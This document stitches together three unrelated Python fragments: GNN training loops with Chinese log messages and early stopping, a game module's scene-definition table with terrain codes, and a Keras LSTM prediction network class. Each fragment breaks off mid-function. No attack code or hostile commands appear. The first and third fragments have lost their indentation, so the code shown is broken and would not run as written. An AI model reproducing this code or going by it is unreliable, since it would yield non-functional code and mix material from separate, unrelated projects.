correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
acc3 = correct / (val_mask.sum().item())
if (time_control.isTimeToStop() == True):
if (epoch <= 150):
return None
return out.detach().cpu().numpy()
if (t.isTimeToStop(1 - acc3, model, epoch) == True):
end_epoch = epoch
print("早停", end_epoch)
break
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
out = model(data)
pred = out.detach().cpu().numpy()
del (model)
del (out)
del (optimizer)
gc.collect()
torch.cuda.empty_cache()
except:
del (model)
del (optimizer)
torch.cuda.empty_cache()
return None
return pred
def mf_train(data, aggr, sample_mask, val_mask, node_norm, device,time_control):
num_class = int(max(data.y)) + 1
model = MF(features_num=data.x.size()[1],num_class=num_class,hidden=32,num_layers=2)
model = model.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(),lr=0.005,weight_decay=0.0005)
print(aggr, "开始训练")
t = StopEarly(2)
try:
for epoch in range(1, 501):
model.train()
optimizer.zero_grad()
out = model(data)
loss = None
if (node_norm != None):
loss = F.nll_loss((out[sample_mask]),data.y[sample_mask],reduction='none')
loss = (loss * node_norm).mean()
else:
loss = F.nll_loss((out[sample_mask]), data.y[sample_mask])
if (epoch % 25 == 0):
model.eval()
out = model(data)
_, pred = out.max(dim=1)
correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
acc3 = correct / (val_mask.sum().item())
if (time_control.isTimeToStop() == True):
if (epoch <= 150):
return None
return out.detach().cpu().numpy()
if (t.isTimeToStop(1 - acc3, model, epoch) == True):
end_epoch = epoch
print("早停", end_epoch)
break
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
out = model(data)
pred = out.detach().cpu().numpy()
del (model)
del (out)
del (optimizer)
gc.collect()
torch.cuda.empty_cache()
except:
del (model)
del (optimizer)
torch.cuda.empty_cache()
return None
return pred
def ggnn_di_train(data, aggr, sample_mask, val_mask, node_norm, device,time_control,hidden,conv_aggr):
num_class = int(max(data.y)) + 1
model = GatedGNN_di(features_num=data.x.size()[1],num_class=num_class,hidden=hidden,aggr=conv_aggr)
model = model.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(),lr=0.005,weight_decay=0.0005)
print(aggr, "开始训练")
t = StopEarly(2)
try:
for epoch in range(1, 501):
model.train()
optimizer.zero_grad()
out = model(data)
loss = None
if (node_norm != None):
loss = F.nll_loss((out[sample_mask]),data.y[sample_mask],reduction='none')
loss = (loss * node_norm).mean()
else:
loss = F.nll_loss((out[sample_mask]), data.y[sample_mask])
if (epoch % 25 == 0):
model.eval()
out = model(data)
_, pred = out.max(dim=1)
correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
acc3 = correct / (val_mask.sum().item())
if (time_control.isTimeToStop() == True):
if (epoch <= 150):
return None
return out.detach().cpu().numpy()
if (t.isTimeToStop(1 - acc3, model, epoch) == True):
end_epoch = epoch
print("早停", end_epoch)
break
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
out = model(data)
pred = out.detach().cpu().numpy()
del (model)
del (out)
del (optimizer)
gc.collect()
torch.cuda.empty_cache()
except:
del (model)
del (optimizer)
torch.cuda.empty_cache()
return None
return pred
def ggin_train(data, aggr, sample_mask, val_mask, node_norm, device,time_control,hidden):
num_class = int(max(data.y)) + 1
model = GatedGIN(features_num=data.x.size()[1],num_class=num_class,hidden=hidden)
model = model.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(),lr=0.005,weight_decay=0.0005)
print(aggr, "开始训练")
t = StopEarly(2)
try:
for epoch in range(1, 501):
model.train()
optimizer.zero_grad()
out = model(data)
loss = None
if (node_norm != None):
loss = F.nll_loss((out[sample_mask]),data.y[sample_mask],reduction='none')
loss = (loss * node_norm).mean()
else:
loss = F.nll_loss((out[sample_mask]), data.y[sample_mask])
if (epoch % 25 == 0):
model.eval()
out = model(data)
_, pred = out.max(dim=1)
correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
acc3 = correct / (val_mask.sum().item())
if (time_control.isTimeToStop() == True):
if (epoch <= 150):
return None
return out.detach().cpu().numpy()
if (t.isTimeToStop(1 - acc3, model, epoch) == True):
end_epoch = epoch
print("早停", end_epoch)
break
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
out = model(data)
pred = out.detach().cpu().numpy()
del (model)
del (out)
del (optimizer)
gc.collect()
torch.cuda.empty_cache()
except:
del (model)
del (optimizer)
torch.cuda.empty_cache()
return None
return pred
def ggin_di_train(data, aggr, sample_mask, val_mask, node_norm, device,time_control,hidden):
num_class = int(max(data.y)) + 1
model = GatedGIN_di(features_num=data.x.size()[1],num_class=num_class,hidden=hidden)
model = model.to(device)
data = data.to(device)
optimizer = torch.optim.Adam(model.parameters(),lr=0.005,weight_decay=0.0005)
print(aggr, "开始训练")
t = StopEarly(2)
try:
for epoch in range(1, 501):
model.train()
optimizer.zero_grad()
out = model(data)
loss = None
if (node_norm != None):
loss = F.nll_loss((out[sample_mask]),data.y[sample_mask],reduction='none')
loss = (loss * node_norm).mean()
else:
loss = F.nll_loss((out[sample_mask]), data.y[sample_mask])
if (epoch % 25 == 0):
model.eval()
out = model(data)
_, pred = out.max(dim=1)
correct = float(pred[val_mask].eq(data.y[val_mask]).sum().item())
acc3 = correct / (val_mask.sum().item())
if (time_control.isTimeToStop() == True):
if (epoch <= 150):
return None
return out.detach().cpu().numpy()
if (t.isTimeToStop(1 - acc3, model, epoch) == True):
end_epoch = epoch
print("早停", end_epoch)
break
loss.backward()
optimizer.step()
model.eval()
with torch.no_grad():
out = model(data)
pred = out.detach().cpu().numpy()
del (model)
del (out)
del (optimizer)
gc.collect()
torch.cuda.empty_cache()
except:
del (model)
del (optimizer)
torch.cuda.empty_cache()
return None
return pred
def mean_train(data, aggr, sample_mask, val_mask, node_norm, device,
time_control):
num_class = int(max(data.y)) + 1
model = GatedGCN(features_num=data.x.size()[1],num_class=num_class,hidden=64,num_layers=2,aggr='mean',res=True)
model = model.to(device)
| |
<filename>src/module_scenes.py<gh_stars>1-10
from header_common import *
from header_operations import *
from header_triggers import *
from header_scenes import *
from module_constants import *
####################################################################################################################
# Each scene record contains the following fields:
# 1) Scene id {string}: used for referencing scenes in other files. The prefix scn_ is automatically added before each scene-id.
# 2) Scene flags {int}. See header_scenes.py for a list of available flags
# 3) Mesh name {string}: This is used for indoor scenes only. Use the keyword "none" for outdoor scenes.
# 4) Body name {string}: This is used for indoor scenes only. Use the keyword "none" for outdoor scenes.
# 5) Min-pos {(float,float)}: minimum (x,y) coordinate. Player can't move beyond this limit.
# 6) Max-pos {(float,float)}: maximum (x,y) coordinate. Player can't move beyond this limit.
# 7) Water-level {float}.
# 8) Terrain code {string}: You can obtain the terrain code by copying it from the terrain generator screen
# 9) List of other scenes accessible from this scene {list of strings}.
# (deprecated. This will probably be removed in future versions of the module system)
# (In the new system passages are used to travel between scenes and
# the passage's variation-no is used to select the game menu item that the passage leads to.)
# 10) List of chest-troops used in this scene {list of strings}. You can access chests by placing them in edit mode.
# The chest's variation-no is used with this list for selecting which troop's inventory it will access.
# town_1 Sargoth #plain
# town_2 Tihr #steppe
# town_3 Veluca #steppe
# town_4 Suno #plain
# town_5 Jelkala #plain
# town_6 Praven #plain
# town_7 Uxkhal #plain
# town_8 Reyvadin #plain
# town_9 Khudan #snow
# town_10 Tulga #steppe
# town_11 Curaw #snow
# town_12 Wercheg #plain
# town_13 Rivacheg #plain
# town_14 Halmar #steppe
# town_15 Yalen
# town_16 Dhirim
# town_17 Ichamur
# town_18 Narra
# town_19 Shariz
# town_20 Durquba
# town_21 Ahmerrad
# town_22 Bariyye
####################################################################################################################
scenes = [
("random_scene", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x300028000003e8fa0000034e00004b34000059be", [], []),
("conversation_scene", sf_generate, "none", "none", (-40.00, -40.00), (40.00, 40.00), -100.0, "0x0000000032c045050002308c0000769a0000644f00004095", [], []),
("water", 0, "none", "none", (-1000.00, -1000.00), (1000.00, 1000.00), -0.5, "0", [], []),
####Moved down
#("random_scene_steppe", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x000000023160050000079dea00003efe00004b34000059be", [], [], "outer_terrain_steppe"),
#
#("random_scene_plain", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x000000023160050000079dea00003efe00004b34000059be", [], [], "outer_terrain_plain"),
#
#("random_scene_snow", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x000000024620050000079dea00003efe00004b34000059be", [], [], "outer_terrain_snow"),
#
#("random_scene_desert", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x000000023160050000079dea00003efe00004b34000059be", [], [], "outer_terrain_desert_b"),
#
#("random_scene_steppe_forest", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x0000000230000500000775de0000034e00004b34000059be", [], [], "outer_terrain_plain"),
#
#("random_scene_plain_forest", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), 0.0, "0x00000000b42005000004bd320000079a00004b3400007dd2", [], [], "outer_terrain_plain"),
#
#("random_scene_snow_forest", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x00000002cc600500000775de0000034e00004b34000059be", [], [], "outer_terrain_snow"),
#
#("random_scene_desert_forest", sf_generate|sf_randomize|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x0000000230000500000775de0000034e00004b34000059be", [], [], "outer_terrain_desert_b"),
####End moved down
("camp_scene", sf_generate|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x300028000003e8fa0000034e00004b34000059be", [], [], "outer_terrain_plain"),
("camp_scene_horse_track", sf_generate|sf_auto_entry_points, "none", "none", (0.00, 0.00), (240.00, 240.00), -0.5, "0x300028000003e8fa0000034e00004b34000059be", [], [], "outer_terrain_plain"),
("four_ways_inn", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x0000000030015f2b000350d4000011a4000017ee000054af", [], [], "outer_terrain_town_thir_1"),
("test_scene", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x0230817a00028ca300007f4a0000479400161992", [], [], "outer_terrain_plain"),
("quick_battle_1", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x30401ee300059966000001bf0000299a0000638f", [], [], "outer_terrain_plain"),
("quick_battle_2", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0xa0425ccf0004a92a000063d600005a8a00003d9a", [], [], "outer_terrain_steppe"),
("quick_battle_3", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x4c6024e3000691a400001b7c0000591500007b52", [], [], "outer_terrain_snow"),
("quick_battle_4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00001d63c005114300006228000053bf00004eb9", [], [], "outer_terrain_plain"),
("quick_battle_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a078bb2000589630000667200002fb90000179c", [], [], "outer_terrain_plain"),
("quick_battle_6", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0xa0425ccf0004a92a000063d600005a8a00003d9a", [], [], "outer_terrain_steppe"),
("quick_battle_7", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "0x314d060900036cd70000295300002ec9000025f3", [], [], "outer_terrain_plain"),
("salt_mine", sf_generate, "none", "none", (-200.00, -200.00), (200.00, 200.00), -100.0, "0x2a07b23200025896000023ee00007f9c000022a8", [], [], "outer_terrain_steppe"),
("novice_ground", sf_indoors, "training_house_a", "bo_training_house_a", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("zendar_arena", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "0xa0001d9300031ccb0000156f000048ba0000361c", [], [], "outer_terrain_plain"),
("dhorak_keep", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x33a7946000028ca300007f4a0000479400161992", ["exit"], []),
("reserved4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "28791", [], []),
("reserved5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "117828", [], []),
("reserved6", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "6849", [], []),
("reserved7", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "6849", [], []),
("reserved8", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "13278", [], []),
("reserved9", sf_indoors, "thirsty_lion", "bo_thirsty_lion", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("reserved10", 0, "none", "none", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
#
("reserved11", 0, "none", "none", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("reserved12", sf_indoors, "thirsty_lion", "bo_thirsty_lion", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("training_ground", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x30000500400360d80000189f00002a8380006d91", [], ["tutorial_chest_1", "tutorial_chest_2"], "outer_terrain_plain_1"),
("tutorial_1", sf_indoors, "tutorial_1_scene", "bo_tutorial_1_scene", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("tutorial_2", sf_indoors, "tutorial_2_scene", "bo_tutorial_2_scene", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("tutorial_3", sf_indoors, "tutorial_3_scene", "bo_tutorial_3_scene", (-100.00, -100.00), (100.00, 100.00), -100.0, "0", [], []),
("tutorial_4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x30000500400360d80000189f00002a8380006d91", [], [], "outer_terrain_plain"),
("tutorial_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("tutorial_6", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("tutorial_7", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("tutorial_8", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("tutorial_9", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x3a06dca80005715c0000537400001377000011fe", [], [], "outer_terrain_plain"),
("training_ground_horse_track_1", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000000337553240004d53700000c0500002a0f80006267", [], [], "outer_terrain_plain"),
("training_ground_horse_track_2", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000000301553240004d5370000466000002a0f800073f1", [], [], "outer_terrain_plain"),
("training_ground_horse_track_3", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000000400c12b2000515470000216b0000485e00006928", [], [], "outer_terrain_snow"),
("training_ground_horse_track_4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000000200b60320004a5290000180d0000452f00000e90", [], [], "outer_terrain_steppe"),
("training_ground_horse_track_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_6", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_7", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_8", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_9", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_10", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_11", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_12", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_13", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_14", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_15", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_16", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_17", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_18", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_1", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001350455c20005194a000041cb00005ae800000ff5", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_2", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x0000000532c8dccb0005194a000041cb00005ae800001bdd", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_3", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000054327dcba0005194a00001b1d00005ae800004d63", [], [], "outer_terrain_snow"),
("training_ground_ranged_melee_4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000012247dcba0005194a000041ef00005ae8000050af", [], [], "outer_terrain_steppe"),
("training_ground_ranged_melee_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_6", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_7", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_8", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_9", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_10", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_11", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_12", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_13", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_14", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_15", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_16", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_17", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_18", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("zendar_center", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "0x300bc5430001e0780000448a0000049f00007932", ["the_happy_boar", "random_scene", "zendar_merchant"], [], "outer_terrain_plain_1"),
("the_happy_boar", sf_indoors, "interior_town_house_f", "bo_interior_town_house_f", (-100.00, -100.00), (100.00, 100.00), -100.0, | |
import time
import tensorflow as tf
from LatentSpacePhysics.src.nn.stages import *
from LatentSpacePhysics.src.nn.helpers import *
from LatentSpacePhysics.src.nn.losses import *
from LatentSpacePhysics.src.nn.callbacks import LossHistory
from LatentSpacePhysics.src.nn.arch.architecture import Network
from LatentSpacePhysics.src.util import array
from LatentSpacePhysics.src.nn.lstm import error_classification
from ops import *
from math import floor
import keras
from keras.optimizers import Adam
from keras import objectives
from keras.layers import *
from keras.layers.pooling import AveragePooling2D, MaxPooling2D
from keras.models import Model, save_model, load_model
from keras.callbacks import Callback
from keras.regularizers import l1_l2, l2
from keras.utils import multi_gpu_model
import keras.backend as K
from keras_models_general import model_to_json
#=====================================================================================
class Prediction(Network):
#---------------------------------------------------------------------------------
def _init_vars(self, config, **kwargs):
self.input_shape = kwargs.get("input_shape", (2, 32))
# Network Parameters
self.stateful = kwargs.get("stateful", False)
self.in_out_states = kwargs.get("in_out_states", False)
self.states = kwargs.get("states", [[None, None], [None, None], [None, None]])
self.return_state = self.in_out_states
self.use_attention = False
self.use_bidirectional = False
self.lstm_activation = "tanh"
self.use_time_conv_decoder = True
self.time_conv_decoder_filters = 256
self.time_conv_decoder_depth = 1
self.adam_epsilon = None
self.adam_learning_rate = 0.000126
self.adam_lr_decay = 0.000334
self.use_bias = True
self.kernel_regularizer = None
self.recurrent_regularizer = None
self.bias_regularizer = None
self.activity_regularizer = None
self.dropout=0.0
self.recurrent_dropout=0.0
self.b_num = config.batch_size
self.z_num = config.z_num
self.w_num = self.input_shape[0]
self.out_w_num = 1
if hasattr(config, 'encoder_lstm_neurons'):
self.encoder_lstm_neurons = config.encoder_lstm_neurons
else:
self.encoder_lstm_neurons = 512
if hasattr(config, 'decoder_lstm_neurons'):
self.decoder_lstm_neurons = config.decoder_lstm_neurons
else:
self.decoder_lstm_neurons = 512
# Loss Setup
self.set_loss(loss="mse")
self.l1_reg = kwargs.get("l1_reg", 0.0)
self.l2_reg = kwargs.get("l2_reg", 0.0)
self.tensorflow_seed = kwargs.get("tensorflow_seed", 4)
self.model = None
tf.set_random_seed(self.tensorflow_seed)
self.gpus = [ int(gpu.strip()) for gpu in config.gpu_id.split(",")]
print("Using GPUs: {}".format(self.gpus))
self.parallel_model = None
# Trainer Variables
self.config = config
self.arch = config.arch
self.is_3d = config.is_3d
self.optimizer = config.optimizer
self.beta1 = config.beta1
self.beta2 = config.beta2
self.model_dir = config.model_dir
self.load_path = config.load_path
self.dataset = config.dataset
#---------------------------------------------------------------------------------
def set_states(self, states):
self.states = states
#---------------------------------------------------------------------------------
def set_loss(self, loss):
self.loss = loss
self.metrics = []
#---------------------------------------------------------------------------------
def _init_optimizer(self, epochs=1):
self.optimizer = Adam(lr=self.adam_learning_rate, epsilon=self.adam_epsilon, decay=self.adam_lr_decay)
return self.optimizer
#---------------------------------------------------------------------------------
def _fix_output_dimension(self, x):
# https://github.com/keras-team/keras/issues/7961
pre_shape = x.shape.as_list()
pre_shape[1] = self.out_w_num
x.set_shape(pre_shape)
return x
#---------------------------------------------------------------------------------
def _build_model(self):
if self.stateful:
pred_input = Input(batch_shape=(self.b_num,) + self.input_shape, dtype="float32", name='Temp_Prediction_Input') # (self.time_steps, self.data_dimension)
else:
pred_input = Input(shape=self.input_shape, dtype="float32", name='Temp_Prediction_Input0') # (self.time_steps, self.data_dimension)
if self.in_out_states:
state_input_0_0 = Input(shape=(self.encoder_lstm_neurons,), dtype="float32", name='State00_Prediction_Input')
state_input_0_1 = Input(shape=(self.encoder_lstm_neurons,), dtype="float32", name='State01_Prediction_Input')
state_input_1_0 = Input(shape=(self.decoder_lstm_neurons,), dtype="float32", name='State10_Prediction_Input')
state_input_1_1 = Input(shape=(self.decoder_lstm_neurons,), dtype="float32", name='State11_Prediction_Input')
lstm_layer = []
x = pred_input
lstm_temp = LSTM(units=self.encoder_lstm_neurons,
dropout=self.dropout,
recurrent_dropout=self.recurrent_dropout,
return_sequences=False,
go_backwards=True,
stateful=self.stateful,
return_state=self.return_state,
name="TempPred_0"
)
lstm_layer.append(lstm_temp)
if self.in_out_states:
x, self.states[0][0], self.states[0][1] = lstm_layer[-1](x, initial_state=[state_input_0_0, state_input_0_1])
else:
x = lstm_layer[-1](x)
x = RepeatVector(self.out_w_num)(x)
lstm_temp = LSTM(units=self.decoder_lstm_neurons,
dropout=self.dropout,
recurrent_dropout=self.recurrent_dropout,
return_sequences=True,
go_backwards=False,
stateful=self.stateful,
return_state=self.return_state,
name="TempPred_1"
)
lstm_layer.append(lstm_temp)
if self.in_out_states:
x, self.states[1][0], self.states[1][1] = lstm_layer[-1](x, initial_state=[state_input_1_0, state_input_1_1])
else:
x = lstm_layer[-1](x)
x = self._fix_output_dimension(x)
if self.use_time_conv_decoder:
for i in range(self.time_conv_decoder_depth):
x = Conv1D(filters=self.time_conv_decoder_filters, kernel_size=1, name="TempPred_{}".format(2+i))(x)
x = LeakyReLU(0.3)(x)
x = Conv1D(filters=self.z_num, kernel_size=1, name="TempPred_{}".format(2+self.time_conv_decoder_depth))(x)
x = self._fix_output_dimension(x)
outputs = [x]
if self.in_out_states:
outputs.append(self.states[0][0])
outputs.append(self.states[0][1])
outputs.append(self.states[1][0])
outputs.append(self.states[1][1])
inputs = [pred_input]
if self.in_out_states:
inputs.append(state_input_0_0)
inputs.append(state_input_0_1)
inputs.append(state_input_1_0)
inputs.append(state_input_1_1)
if len(self.gpus) > 1:
with tf.device('/cpu:0'):
self.model = Model(name="Prediction", inputs=inputs, outputs=outputs)
else:
self.model = Model(name="Prediction", inputs=inputs, outputs=outputs)
#---------------------------------------------------------------------------------
def _inner_RNN_layer(self, use_gru, output_dim, go_backwards, return_sequences, return_state):
activation=self.lstm_activation #def: tanh
recurrent_activation='hard_sigmoid' #def: hard_sigmoid
kernel_regularizer = l2(l=self.kernel_regularizer) if self.kernel_regularizer is not None else None
recurrent_regularizer = l2(l=self.recurrent_regularizer) if self.recurrent_regularizer is not None else None
bias_regularizer = l2(l=self.bias_regularizer) if self.bias_regularizer is not None else None
activity_regularizer = l2(l=self.activity_regularizer) if self.activity_regularizer is not None else None
if use_gru:
return GRU( units=output_dim,
stateful=self.stateful,
go_backwards=go_backwards,
return_sequences=return_sequences,
activation=activation, #def: tanh
recurrent_activation=recurrent_activation, #def: hard_sigmoid
dropout=self.dropout, #def: 0.
recurrent_dropout=self.recurrent_dropout, #def: 0.
return_state=return_state
)
else:
return LSTM(units=output_dim,
activation=activation, #def: tanh
recurrent_activation=recurrent_activation, #def: hard_sigmoid
use_bias=self.use_bias,
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
unit_forget_bias=True,
kernel_regularizer=kernel_regularizer,
recurrent_regularizer=recurrent_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=None,
recurrent_constraint=None,
bias_constraint=None,
dropout=self.dropout, #def: 0.
recurrent_dropout=self.recurrent_dropout, #def: 0.
return_sequences=return_sequences,
go_backwards=go_backwards,
stateful=self.stateful,
return_state=return_state
)
#---------------------------------------------------------------------------------
def _add_RNN_layer_func(self, previous_layer, output_dim, go_backwards, return_sequences, return_state, bidirectional=False, use_gru=False):
def _bidirectional_wrapper(use_bidirectional, inner_layer, merge_mode='concat'):
if use_bidirectional:
return Bidirectional(layer=inner_layer, merge_mode=merge_mode)
else:
return inner_layer
